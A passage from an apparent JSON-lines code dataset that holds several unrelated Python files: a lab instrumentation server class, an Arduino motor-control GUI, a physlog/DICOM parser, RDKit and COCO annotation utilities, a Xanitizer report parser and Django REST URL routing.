\"\"\"\r\n raise NotImplementedError\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n def snapshot(self,msg_in = None, client = None):\r\n \"\"\"\r\n returns snapshot of selected or all controls and indicators.\r\n see example below\r\n\r\n EXAMPLE:\r\n response = {}\r\n response[b'name'] = self.name\r\n response[b'controls'] = self.ctrls.get()\r\n response[b'indicators'] = self.inds.get()\r\n return response\r\n \"\"\"\r\n raise NotImplementedError\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n\r\n\r\n def controls(self,msg_in = {b'all':None}, client = None):\r\n \"\"\"\r\n return current control(controls) according to the input dictionary.\r\n example:\r\n the command->\r\n controls(msg = {b'controls':{'button1':None,'button2':None,'scanrate':2.0}})\r\n will set scanrate to 2.0 and return current setting for button1, button2 and scanrate\r\n \"\"\"\r\n debug('icarusSL controls command received: %r' % msg_in)\r\n response = {}\r\n msg_out = {}\r\n msg_out[b'message'] = {}\r\n err = ''\r\n flag = True\r\n if isinstance(msg_in,dict):\r\n if b'all' in list(msg_in.keys()):\r\n response = self.ctrls.get()\r\n ctrls_keys = self.ctrls.keys()\r\n else:\r\n ctrls_keys = self.ctrls.keys()\r\n for key in msg_in:\r\n if msg_in[key] is None:\r\n if key in ctrls_keys:\r\n response[key] = getattr(self.ctrls,key.decode(\"utf-8\"))\r\n else:\r\n response[key] = None\r\n err = \"control doesn't exist\"\r\n else:\r\n if key in ctrls_keys:\r\n setattr(self.ctrls,key.decode(\"utf-8\"),msg_in[key])\r\n response[key] = getattr(self.ctrls,key.decode(\"utf-8\")) #msg_in[key]\r\n else:\r\n response[key] = None\r\n err = \"control doesn't exist\"\r\n\r\n msg_out[b'flag'] = flag\r\n msg_out[b'message'][b'controls'] = response\r\n msg_out[b'error'] = err\r\n return msg_out\r\n\r\n def indicators(self, msg_in = {b'all':None}, client = None):\r\n \"\"\"\r\n this function takes 7us to execute probably because of hashtable,etc.\r\n If I call the function directly, I can execute it in 1 us\r\n \"\"\"\r\n debug('icarusSL indicators command received: %r' % msg_in)\r\n response = {}\r\n msg_out = {}\r\n msg_out[b'message'] = {}\r\n err = ''\r\n flag = True\r\n if isinstance(msg_in,dict):\r\n if b'all' in list(msg_in.keys()):\r\n response = self.inds.get()\r\n inds_keys = self.inds.keys()\r\n else:\r\n inds_keys = self.inds.keys()\r\n for key in msg_in:\r\n if msg_in[key] is None:\r\n\r\n if key in inds_keys:\r\n response[key] = getattr(self.inds,key.decode(\"utf-8\"))\r\n else:\r\n response[key] = None\r\n err = \"indicator doesn't exist\"\r\n else:\r\n if key in inds_keys:\r\n setattr(self.inds,key.decode(\"utf-8\"),msg_in[key])\r\n response[key] = getattr(self.inds,key.decode(\"utf-8\"))\r\n else:\r\n response[key] = None\r\n err = 'error'\r\n msg_out[b'flag'] = flag\r\n msg_out[b'message'][b'indicators'] = response\r\n msg_out[b'error'] = err\r\n return msg_out\r\n\r\n def notify_subscribers(self, msg_in = None, client = None):\r\n\r\n raise NotImplementedError\r\n\r\n def schedule(self, task_list = []):\r\n try:\r\n self.controls.set({b'task_queue':task_list})\r\n flag = True\r\n except:\r\n error(traceback.format_exc())\r\n flag = False\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n###\r\n ##########################################\r\n ### 
TASK SECTION: schedule, execute and abort\r\n    #######################################\r\n    \"\"\"\r\n    This section is dedicated to functions that take care of\r\n    the queue task concept and help to execute it.\r\n    \"\"\"\r\n    def schedule_task_queue(self, task_list = []):\r\n        try:\r\n            self.controls.set({b'task_queue':task_list})\r\n            response = True\r\n        except:\r\n            error(traceback.format_exc())\r\n            response = False\r\n        return response\r\n\r\n    def abort_task_queue(self):\r\n        try:\r\n            self.controls.set({b'task_queue':[]})\r\n            response = True\r\n        except:\r\n            error(traceback.format_exc())\r\n            response = False\r\n        return response\r\n\r\n    def execute_task_queue(self):\r\n        if len(self.controls.task_queue) > 0:\r\n            if self.controls.task_queue[0][0] - time() <=0:\r\n                try:\r\n                    info('executing: %r, with flag %r' %\r\n                         (self.controls.task_queue[0],\r\n                          self.controls.task_queue[0][1] == b'change_offset'))\r\n                    if self.controls.task_queue[0][1] == b'change_offset' or self.controls.task_queue[0][1] == 'change_offset':\r\n\r\n                        self.change_offset(self.controls.task_queue[0][2][b'offset'])\r\n                        self.controls.task_queue.pop(0)\r\n                except:\r\n                    pass  # error(traceback.format_exc())\r\n                flag = True\r\n            else:\r\n                flag = False\r\n        else:\r\n            flag = False\r\n        return flag\r\n\r\n    #########\r\n    ### OTHER TASKS GO HERE. The XLevel can support multiple additional tasks\r\n    ### which are more complicated than just return indicators or controls\r\n    ########\r\n    #def start(self): This is not needed for the class Thread\r\n    #    \"\"\"\"\"\"\r\n    #    raise NotImplementedError\r\n\r\n    def stop(self):\r\n        \"\"\"\"\"\"\r\n        raise NotImplementedError\r\n\r\n    def run_once(self):\r\n        \"\"\"\"\"\"\r\n        raise NotImplementedError\r\n\r\n    def run(self):\r\n        \"\"\"\"\"\"\r\n        self.running = True\r\n        while self.running:\r\n            self.run_once()\r\n            sleep(1)\r\n        raise NotImplementedError\r\n\r\n\r\n    def get_circular_buffer(self, msg_in = None, client = None):\r\n        \"\"\"\r\n        returns data from server circular buffer. 
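Only samples newer than the client's g_pointer are sent back (editor's note, inferred from the pointer comparison below). 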
Input, name of the circular buffer and global pointer.\r\n        msg_in has to be a dictionary with circular buffer name\r\n        the global_pointer specifies the last sample the client has already received\r\n        msg_in = {b'buffer_name':b'name',b'g_pointer':999}\r\n        \"\"\"\r\n        msg_out = {b'message':{}}\r\n        flag = True\r\n        err = ''\r\n\r\n        in_buffer_name = msg_in[b'buffer_name']\r\n        in_g_pointer = msg_in[b'g_pointer']\r\n        if in_buffer_name in self.circular_buffers.keys():\r\n            g_pointer = self.circular_buffers[in_buffer_name].g_pointer\r\n            pointer = self.circular_buffers[in_buffer_name].pointer\r\n            size = self.circular_buffers[in_buffer_name].size\r\n            if in_g_pointer > g_pointer:\r\n                data = self.circular_buffers[in_buffer_name].get_all()\r\n            elif in_g_pointer < g_pointer:\r\n                if g_pointer - in_g_pointer > size[1]:\r\n                    data = self.circular_buffers[in_buffer_name].get_all()\r\n                else:\r\n                    N = g_pointer - in_g_pointer\r\n                    data = self.circular_buffers[in_buffer_name].get_N(N, M = pointer)\r\n            else:\r\n                data = None\r\n\r\n        self.circular_buffers[in_buffer_name]\r\n\r\n        msg_out[b'flag'] = flag\r\n        msg_out[b'message'][b'data'] = data\r\n        msg_out[b'message'][b'g_pointer'] = g_pointer\r\n        msg_out[b'message'][b'pointer'] = pointer\r\n        msg_out[b'error'] = err\r\n        return msg_out\r\n\r\n    def retrieve_values(self, msg_in = None , N = 2, order = 2, test_flag = None, client = None):\r\n        \"\"\"\r\n        msg_in = {b'buffer_name':b'name',b'time_vector': asarray([ 1,  1,  1,  1,  1,  1,  1])}\r\n        N - number of points to consider when obtaining the estimated value\r\n        \"\"\"\r\n        from numpy import argmin, argwhere, loadtxt, nanmax,\\\r\n             nanmin, nan, nanargmin, nanargmax\r\n\r\n        from XLI.auxiliary import sort_vector, expand_vector, get_estimate\r\n\r\n\r\n        msg_out = {b'message':{}}\r\n        flag = True\r\n        err = ''\r\n        out_array = None\r\n\r\n        if isinstance(msg_in,dict):\r\n            in_buffer_name = msg_in[b'buffer_name']\r\n            in_vector = sort_vector(msg_in[b'time_vector'])\r\n            if in_buffer_name in self.circular_buffers.keys():\r\n                ndim = self.circular_buffers[in_buffer_name].size[0]\r\n                out_array = expand_vector(in_vector, ndim = ndim)\r\n                for i in range(len(in_vector)):\r\n                    for j in range(1,ndim):\r\n                        x = self.circular_buffers[in_buffer_name].get_all()[0,:]\r\n                        y = self.circular_buffers[in_buffer_name].get_all()[j,:]\r\n                        x_est = in_vector[i]\r\n                        if x_est > nanmax(x):\r\n                            y_est = nan\r\n                            err += 'requested value(%r) outside of the buffer boundaries. value > nanmax (%r)' % (x_est,nanmax(x))\r\n                        elif x_est < nanmin(x):\r\n                            y_est = nan\r\n                            err += 'requested value(%r) outside of the buffer boundaries. 
value < nanmin (%r)' % (x_est,nanmin(x))\r\n                        else:\r\n                            idx = nanargmin((x - x_est)**2)\r\n                            debug('idx = %r' %idx)\r\n                            if idx >= len(x)-2:\r\n                                N_after = 0\r\n                                N_before = N\r\n                            elif idx <= 1:\r\n                                N_after = N+1\r\n                                N_before = 0\r\n                            else:\r\n                                N_after = N+1\r\n                                N_before = N\r\n                            debug('N_after %r, N_before %r' %(N_after,N_before))\r\n\r\n                            y_est = get_estimate(x[idx-N_before:idx+N_after],y[idx-N_before:idx+N_after],x_est, order = order)\r\n\r\n                        out_array[j,i] = y_est\r\n\r\n            else:\r\n                err = \"buffer doesn't exist\"\r\n                out_vector = msg_in[b'time_vector']\r\n        msg_out[b'flag'] = flag\r\n        msg_out[b'message'][b'out_array'] = out_array\r\n        msg_out[b'error'] = err\r\n        return msg_out\r\n########################################\r\n### Threading Section ###\r\n####################################\r\n\r\n###BINDING OF A SERVER MODULE WITH XLevel EXAMPLE\r\n\r\n##from server_LL import server\r\n##server.init_server(name = 'icarus-server')\r\n##server.commands[b'init'] = icarus_SL.init\r\n###server.commands[b'help'] = device.help\r\n###server.commands[b'snapshot'] = device.snapshot\r\n###server.commands[b'close'] = device.close\r\n##server.commands[b'controls'] = icarus_SL.controls\r\n##server.commands[b'indicators'] = icarus_SL.indicators\r\n###server.commands[b'retrieve_values'] = device.retrieve_values\r\n##server.commands[b'subscribe'] = server.subscribe\r\n###server.commands[b'buffers_update'] = device.buffers_update\r\n###server.commands[b'dump_buffers'] = icarus_SL.subscribe\r\n\r\n\r\n\r\nif __name__ == \"__main__\": #for testing\r\n    from tempfile import gettempdir\r\n    import logging\r\n    #logging.basicConfig(#filename=gettempdir()+'/icarus_SL.log',\r\n    #                level=logging.INFO, format=\"%(asctime)s %(levelname)s: %(message)s\")\r\n","sub_path":"ubcs_auxiliary/trash/XLI/hierarchy_instrumentation.py","file_name":"hierarchy_instrumentation.py","file_ext":"py","file_size_in_byte":17563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216206418","text":"#Sending commands to the Arduino via Serial communication to move a motor\n#libraries\nimport serial\nimport tkinter as tk\n\n#Objects\ns = serial.Serial(\"/dev/ttyACM0\",9600)\n\n#Functions\ndef uno():\n    dato = \"1\"\n    s.write(dato.encode())\ndef dos():\n    dato = \"2\"\n    s.write(dato.encode())\ndef tres():\n    dato = \"3\"\n    s.write(dato.encode())\ndef cuatro():\n    dato = \"4\"\n    s.write(dato.encode())\n\n#Program Body\nw = tk.Tk()\nw.title(\"Controlling Motor\")\n\nf = tk.Frame(w).grid(row=0,column=0)\n\nlb1 = tk.Label(f,text=\"Select an Option\").grid(row=0,column=0,columnspan=4)\n\nbtn1 = tk.Button(f,text=\"0 Degrees\",command=uno,width=20).grid(row=1,column=0)\nbtn2 = tk.Button(f,text=\"90 Degrees\",command=dos,width=20).grid(row=1,column=1)\nbtn3 = tk.Button(f,text=\"180 Degrees\",command=tres,width=20).grid(row=1,column=2)\nbtn4 = tk.Button(f,text=\"Full Rotation\",command=cuatro,width=20).grid(row=1,column=3)\n \nw.mainloop()\ns.close()\n","sub_path":"motor/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"459314287","text":"s1,s2,n=input().split()\nd={}\nc=0\nfor i in range(len(s1)):\n    if(s1[i] not in d.keys()):\n        d[s1[i]]=s2[i]\n    else:\n        if(d[s1[i]]==s2[i]):\n            continue\n        else:\n            c+=1\nif(c==int(n) or c==0):\n    print(\"yes\")\nelse:\n    
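# Added comment: reached when the mismatch count is neither 0 nor exactly n\n    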
print(\"no\")\n","sub_path":"isomorphic_except_count.py","file_name":"isomorphic_except_count.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324841288","text":"#!/usr/bin/env python\n#\n# Load a Philips scan physlog file, trim to the exact scan time, and split into separate \n# cardiac and respiratory signals. Save to AFNI .1D format. \n\n# EDITED 26 FEB 2020 for new VAT calculation\n\nimport os\nimport sys\nimport pandas\nimport pydicom\nimport datetime\n\n\n###########################################################################################\n# Get inputs\nif len(sys.argv) is not 4:\n print('Usage:')\n print(sys.argv[0] + ' physlog_file physlog_Hz dicom_file')\n exit()\n\nphyslog_file = sys.argv[1]\nphyslog_Hz = sys.argv[2]\ndicom_file = sys.argv[3]\nprint('Physlog file: ' + physlog_file)\nprint('Physlog sampling rate in Hz: ' + physlog_Hz)\nprint('DICOM file: ' + dicom_file)\nphyslog_Hz = float(physlog_Hz)\n\n\n###########################################################################################\n# Get acquisition duration from the DICOM\nprint('Getting volume acquisition time from %s' % dicom_file)\nds = pydicom.dcmread(dicom_file)\n\n\n# (5200,9230) PerFrameFunctionalGroupsSequence\n# (2005,140f) Private field\n# (2005,10a0) Private field - frame start time in sec\n# (0020,9111) FrameContentSequence\n# (0018,9074) FrameAcquisitionDateTime\n# (0020,9157) DimensionIndexValues (0=irrelevant,1=slice,2=volume)\n\n# Acquisition time and dim index for each frame\nPerFrameFunctionalGroupsSequence = ds[0x5200,0x9230]\nFrameAcquisitionDateTime = [x[0x0020,0x9111][0][0x0018,0x9074] \n for x in PerFrameFunctionalGroupsSequence]\nFrameStartTimeSec = [x[0x2005,0x140f][0][0x2005,0x10a0] \n for x in PerFrameFunctionalGroupsSequence]\nDimensionIndexValues1 = [x[0x0020,0x9111][0][0x0020,0x9157][1] \n for x in PerFrameFunctionalGroupsSequence]\nDimensionIndexValues2 = [x[0x0020,0x9111][0][0x0020,0x9157][2] \n for x in PerFrameFunctionalGroupsSequence]\n\n# Boolean - is this element the min or max index of the entire bunch?\nmin1 = [x==min(DimensionIndexValues1) for x in DimensionIndexValues1]\nmin2 = [x==min(DimensionIndexValues2) for x in DimensionIndexValues2]\nmax2 = [x==max(DimensionIndexValues2) for x in DimensionIndexValues2]\n\n# Index value of min slice + min volume, and min slice + max volume\n# (The first and last volumes of the time series)\nminloc = [i for i,xy in enumerate(zip(min1,min2)) if xy[0] and xy[1]][0]\nmaxloc = [i for i,xy in enumerate(zip(min1,max2)) if xy[0] and xy[1]][0]\n\n# Starttime for first and last volumes, in sec, by private field\nmindtP = FrameStartTimeSec[ minloc ].value\nmaxdtP = FrameStartTimeSec[ maxloc ].value\n\n# Datetime for first and last volumes from frametime, converted to datetime\nmindtstr = FrameAcquisitionDateTime[ minloc ]\nmaxdtstr = FrameAcquisitionDateTime[ maxloc ]\nmindtD = datetime.datetime.strptime(mindtstr.value,'%Y%m%d%H%M%S.%f')\nmaxdtD = datetime.datetime.strptime(maxdtstr.value,'%Y%m%d%H%M%S.%f')\n\n# Compute volume acquisition time both ways. 
Note, totaltime is from beginning \n# of first vol to beginning of last vol\ntotaltimeP = maxdtP - mindtP\ntotaltimeD = (maxdtD-mindtD).total_seconds()\nnvols = max(DimensionIndexValues2) - min(DimensionIndexValues2)\n\nprint('VAT from frame timestamps: %f' % (totaltimeD/nvols) )\nprint('VAT from private field: %f' % (totaltimeP/nvols) )\n\n# Use the private field to compute VAT (probably more accurate)\nvat = totaltimeP / nvols\n\n# Save voltime in sec to file\nprint('Saving estimated voltime %f in vat.txt' % (vat))\nwith open('vat.txt','w') as f:\n    f.write( '%f' % (vat) )\n\n\n\n# NEW NVOLS\n# Number of vols from dicom\n# NumberOfTemporalPositions from first frame (Philips private field)\n# PerFrameFunctionalGroupsSequence[0].Private_2005_140f[0].NumberOfTemporalPositions\n# Does not include dummy scans\nds = pydicom.dcmread(dicom_file)\nPerFrameFunctionalGroupsSequence = ds[0x5200,0x9230]\nnvols = int( PerFrameFunctionalGroupsSequence[0][0x2005,0x140f][0][0x0020,0x0105].value )\nprint('Number of volumes: %d' % nvols)\n\n\n\n\n\n###########################################################################################\n# Load the physlog file, trim to match scan length, save card/resp in AFNI .1D format\nphyslog = pandas.read_csv(physlog_file,delim_whitespace=True,skiprows=6,header=None)\ncard = physlog.iloc[:,4]\nresp = physlog.iloc[:,5]\nmark = physlog.iloc[:,9]\nlastmark = int(max(mark[mark==20].index))\nrowsneeded = int(round(nvols * vat * physlog_Hz))\nfirstmark = int(lastmark - rowsneeded + 1)\nprint('Keeping %d physlog points from %d to %d' % (rowsneeded,firstmark,lastmark+1))\ncard = card[firstmark:lastmark+1]\nresp = resp[firstmark:lastmark+1]\ncard.to_csv('physlog_cardiac.csv',header=False,index=False)\nresp.to_csv('physlog_respiratory.csv',header=False,index=False)","sub_path":"src/parse_physlog.py","file_name":"parse_physlog.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90857745","text":"import uuid\nfrom pathlib import Path\nfrom logging import DEBUG, Formatter, StreamHandler, getLogger\n\nfrom rdkit import Chem\n\n\ndef get_logger():\n    logger = getLogger(str(uuid.uuid4()))\n    logger.setLevel(DEBUG)\n    stream_handler = StreamHandler()\n    handler_format = Formatter(\n        '(%(levelname)s)[%(asctime)s]\\n%(message)s')\n    stream_handler.setFormatter(handler_format)\n    logger.addHandler(stream_handler)\n    return logger\n\n\ndef to_sdf_by_confIds(mol, confIds, filename):\n    writer = Chem.SDWriter(filename)\n    for confID in confIds:\n        writer.write(mol, confId=confID)\n    writer.close()\n\n\ndef from_multisdf(filepath):\n    if not Path(filepath).exists():\n        raise FileNotFoundError(f\"{str(filepath)}\")\n\n    suppl = Chem.SDMolSupplier(filepath)\n    mols = [mol for mol in suppl if mol is not None]\n    mols = list(map(Chem.AddHs, mols))\n    return mols\n","sub_path":"qmkit/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"492273209","text":"# %matplotlib inline\nfrom pycocotools.coco import COCO\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nimport pylab\n#################################################\nimport cv2\n# import pandas as pd\ndef showNimages(imgIds, annFile, imageFile, resultFile):\n    \"\"\"\n    :param imageidFile: the image ids to inspect, stored as a single column in a csv file (the current design expects 6-digit image ids; shorter ids can be left-padded with zeros)\n    :param annFile: the annotation file to use\n    :param 
imageFile: the folder containing the images to read\r\n    :param resultFile: the folder where the annotated images are saved\r\n    :return:\r\n    \"\"\"\r\n    # data = pd.read_csv(imageidFile)\r\n    # list = data.values.tolist()\r\n    # str_image_id = [] # stores the image ids to extract\r\n    # for i in range(len(imgIds)):\r\n    #     str_tmp =''\r\n    #     for j in range(6-len(str(imgIds[i]))):\r\n    #         str_tmp +='0'\r\n    #     str_tmp += str(imgIds[i])\r\n    #     str_image_id.append(str_tmp)\r\n    # print(str_image_id)\r\n    # print(len(str_image_id))\r\n    coco = COCO(annFile)\r\n    # Anns_txt = open(resultFile+'AnnsCat.txt', 'a')\r\n    Anns_txt = open(resultFile + 'testSheep.txt', 'a')\r\n    dogId = coco.getCatIds(['dog'])\r\n    catId = coco.getCatIds(['cat'])\r\n    sheepId = coco.getCatIds(['sheep'])\r\n\r\n    for i in range(len(imgIds)):\r\n        str_image_id = ''\r\n        for j in range(6-len(str(imgIds[i]))):\r\n            str_image_id +='0'\r\n        str_image_id += str(imgIds[i])\r\n        img_tmp_str = '000000' + str_image_id + '.jpg'\r\n        image_s = cv2.imread(imageFile + '000000' + str_image_id + '.jpg')\r\n        image = image_s\r\n        shape = image.shape\r\n        (imgH,imgW,imgC) = shape\r\n        img_anns_tmp = {}\r\n        annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=dogId)\r\n        class_id = 0\r\n        dog_anns = coco.loadAnns(annIds)\r\n        img_anns_tmp[class_id]=dog_anns\r\n        annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=catId)\r\n        class_id = 1\r\n        cat_anns = coco.loadAnns(annIds)\r\n        img_anns_tmp[class_id] = cat_anns\r\n        annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=sheepId)\r\n        class_id = 7\r\n        sheep_anns = coco.loadAnns(annIds)\r\n        img_anns_tmp[class_id] = sheep_anns\r\n\r\n        # for n in range(len(anns)):\r\n        #     x, y, w, h = anns[n]['bbox']\r\n        #     x, y, w, h = int(x), int(y), int(w), int(h)\r\n        #     # print(x, y, w, h)\r\n        #     # cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255))\r\n        #     x_min = round(float(x)/imgW,7); y_min= round(float(y)/imgH,7)\r\n        #     x_max = round(float(x + w)/imgW,7); y_max = round(float(y + h)/imgH,7)\r\n        #     img_tmp_str += ' ' + str(x_min) + ',' + str(y_min) + ',' + str(x_max) + ',' + str(y_max) + ',' + str(class_id)\r\n        # annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=catId)\r\n        for key in img_anns_tmp.keys():\r\n            class_id = key\r\n            anns = img_anns_tmp[key]\r\n            for n in range(len(anns)):\r\n                x, y, w, h = anns[n]['bbox']\r\n                x, y, w, h = int(x), int(y), int(w), int(h)\r\n                # print(x, y, w, h)\r\n                # cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0))\r\n                #fractional coordinates\r\n                # x_min = round(float(x) / imgW, 7)\r\n                # y_min = round(float(y) / imgH, 7)\r\n                # x_max = round(float(x + w) / imgW, 7)\r\n                # y_max = round(float(y + h) / imgH, 7)\r\n                #integer coordinates\r\n                x_min = x; y_min = y; x_max = x + w; y_max = y + h\r\n                img_tmp_str += ' ' + str(x_min) + ',' + str(y_min) + ',' + str(x_max) + ',' + str(y_max) + ',' + str(\r\n                    class_id)\r\n        Anns_txt.write(img_tmp_str + '\\n')\r\n        # class_id = 1\r\n        # anns = coco.loadAnns(annIds)\r\n        # for n in range(len(anns)):\r\n        #     x, y, w, h = anns[n]['bbox']\r\n        #     x, y, w, h = int(x), int(y), int(w), int(h)\r\n        #     # print(x, y, w, h)\r\n        #     # cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0))\r\n        #     x_min = round(float(x)/imgW,7); y_min= round(float(y)/imgH,7)\r\n        #     x_max = round(float(x + w)/imgW,7); y_max = round(float(y + h)/imgH,7)\r\n        #     img_tmp_str += ' ' + str(x_min) + ',' + str(y_min) + ',' + str(x_max) + ',' + str(y_max) + ',' + str(class_id)\r\n        #\r\n        # Anns_txt.write(img_tmp_str + '\\n')\r\n        img_tmp_str = ''\r\n        # cv2.imwrite(resultFile + 'CatImg/000000' + str_image_id + '.jpg', image)\r\n        cv2.imwrite(resultFile + 'testSheep/000000' + str_image_id + '.jpg', image)\r\n    Anns_txt.close()\r\n    print(\"Generated images are stored in {}\".format(resultFile))\r\n######################################################\r\n\r\npylab.rcParams['figure.figsize'] = (8.0, 
10.0)\ndataDir='/media/we/work/TrainData/coco'\ndataType='train2017'\ndataType='val2017'\nannFile='{}/annotations/instances_{}.json'.format(dataDir,dataType)\n\nimageidFile = '/Desktop/myimage_id.csv'\nimageFile = dataDir+'/'+dataType+'/'\nresultFile = '/media/we/Seagate Expansion Drive/狗数据集/CoCo/'\n\n# initialize COCO api for instance annotations\ncoco=COCO(annFile)\n\ntotal_imgIds = coco.getImgIds()\n# get the label ID for 'dog'\ncatIds = coco.getCatIds(['sheep'])\n\n# find the IDs of the images containing dogs among all images\nimgIds = coco.getImgIds(total_imgIds, catIds)\n# imgIds22 = coco.getImgIds(total_imgIds, coco.getCatIds(['dog','cat']))\n# imgIds = imgIds -imgIds22\nimgAnnIds = coco.getAnnIds(imgIds, catIds)\n# look up the image info from the found IDs\nimg = coco.loadImgs(imgIds)\nAnns = coco.loadAnns(imgAnnIds)\n# load one image from the image info\nI = io.imread('%s/%s/%s' % (dataDir, dataType, img[1]['file_name']))\n\nfor Ann in Anns:\n    if Ann['image_id']==img[1]['id']:\n        bbox = Ann['bbox']\n# display it with scikit-image\nplt.axis('off')\nplt.imshow(I)\nplt.show()\n\nshowNimages(imgIds, annFile, imageFile, resultFile)\n#\n#\n#\n# # display COCO categories and supercategories\n# cats = coco.loadCats(coco.getCatIds(['dog']))\n# Anns = coco.loadAnns(coco.getAnnIds())\n# nms=[cat['name'] for cat in cats]\n# category_id=set([Ann['category_id'] for Ann in Anns])\n# print('COCO categories: \\n{}\\n'.format(' '.join(nms)))\n#\n# # nms = set([cat['supercategory'] for cat in cats])\n# # print('COCO supercategories: \\n{}'.format(' '.join(nms)))\n# # get all images containing given categories, select one at random\n# catIds = coco.getCatIds(catNms=['person','dog','skateboard']);\n# imgIds = coco.getImgIds(catIds=catIds );\n# imgIds = coco.getImgIds(imgIds = [324158])\n# img = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]\n# # load and display image\n# I = io.imread('%s/images/%s/%s'%(dataDir,dataType,img['file_name']))\n# # use url to load image\n# # I = io.imread(img['coco_url'])\n# plt.axis('off')\n# plt.imshow(I)\n# plt.show()\n# # load and display instance annotations\n# plt.imshow(I); plt.axis('off')\n# annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\n# anns = coco.loadAnns(annIds)\n# coco.showAnns(anns)","sub_path":"PythonAPI/cocodata.py","file_name":"cocodata.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537590797","text":"import lxml.etree as xml\nfrom api.utils import write_results\nfrom django.utils import timezone\n\ndef parse_xanitizer(xml_file,user_name,init_es):\n\ttry:\n\t\tdata = xml.parse(xml_file) \n\texcept (xml.XMLSyntaxError,xml.ParserError):\n\t\traise MalFormedXMLException(user_name)\n\tdata = data.getroot()\n\tpath = data.xpath(r'//XanitizerFindingsList')\n\tprint(\"xanitizer parsing initiated\")\n\tfor main in path :\n\t\tfor finding in main.findall('finding'):\n\t\t\tproblemType = finding.findtext(\"problemType\")\n\t\t\trating = finding.findtext(\"rating\")\n\t\t\tresult_rating = int(float(rating))\n\t\t\ttry:\n\t\t\t\tcwehead,cweNumber = finding.findtext(\"cweNumber\").split('-')\n\t\t\texcept:\n\t\t\t\tcweNumber=0\n\t\t\tdescription = finding.findtext(\"description\")\n\t\t\tstartNode = finding.findtext(\"startNode\")\n\t\t\tnode = finding.findall(\"node\")\n\t\t\tstart_node =finding.findall(\"startNode\")\n\t\t\tclassification = finding.findtext(\"classification\")\n\t\t\tseverity ={}\n\t\t\tif classification == 'Must Fix':\n\t\t\t\tseverity['HIGH'] = 3\n\t\t\t\tseverity_name = 'HIGH'\n\t\t\telif classification == 
'Warning':\n\t\t\t\tseverity['Medium'] = 2\n\t\t\t\tseverity_name = 'Medium'\n\t\t\telif classification == 'Information':\n\t\t\t\tseverity['Low'] = 1\n\t\t\t\tseverity_name = 'Low'\n\t\t\telif classification == 'Harmless':\n\t\t\t\tseverity['Info'] = 0\n\t\t\t\tseverity_name = 'Info'\n\t\t\tfor startNode in start_node:\n\t\t\t\tkeys = startNode.keys()\n\t\t\t\tevids=[]\n\t\t\t\tfor items, key in enumerate(keys):\n\t\t\t\t\tif key == \"absolutePath\" :\n\t\t\t\t\t\tabsolutePath = startNode.values()[items]\n\t\t\t\t\t\tevids.append({\"url\":absolutePath})\n\n\t\t\tfor dictnode in node:\n\t\t\t\tkeys = dictnode.keys()\n\t\t\t\tevids=[]\n\t\t\t\tfor items, key in enumerate(keys):\n\t\t\t\t\tif key == \"absolutePath\" :\n\t\t\t\t\t\tabsolutePath = dictnode.values()[items]\n\t\t\t\t\t\tevids.append({\"url\":absolutePath})\n\n\t\t\tvul_dict = init_es\n\t\t\tvul_dict['vulnerability'] = {\n\t\t\t\t'name': problemType,\n\t\t\t\t'is_false_positive':False,\n\t\t\t\t'is_remediated':False,\n\t\t\t\t'is_deleted':False,\n\t\t\t\t'tool':'xanitizer',\n\t\t\t\t'confidence':result_rating,\n\t\t\t\t'severity':severity.get(severity_name),\n\t\t\t\t'description': description,\n\t\t\t\t'vul_type':'Insecure Coding',\n\t\t\t\t'remediation':'',\n\t\t\t\t'created_on':timezone.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t}\n\t\t\tvul_dict['vulnerability']['evidences'] = evids\n\t\t\tvul_dict['vulnerability']['cwe'] = {\n\t\t\t\t\t\t'cwe_id':cweNumber,\n\t\t\t\t\t\t'cwe_link':'https://cwe.mitre.org/data/definitions/%s.html'%cweNumber\n\t\t\t\t\t}\t\t\n\n\t\t\twrite_results(vul_dict)\n\tprint(\"xanitizer parsing completed\")\n\n","sub_path":"orchestron-community-api/orchy_project/parsers/xanitizer.py","file_name":"xanitizer.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"67665246","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView, TokenVerifyView\n\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'post', views.PostViewSet)\nrouter.register(r'comment', views.CommentViewSet)\n\nurlpatterns = [\n    path('', include(router.urls)),\n    path(\n        'jwt/', include([\n            path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n            path('refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n            path('verify/', TokenVerifyView.as_view(), name='token_verify'),\n        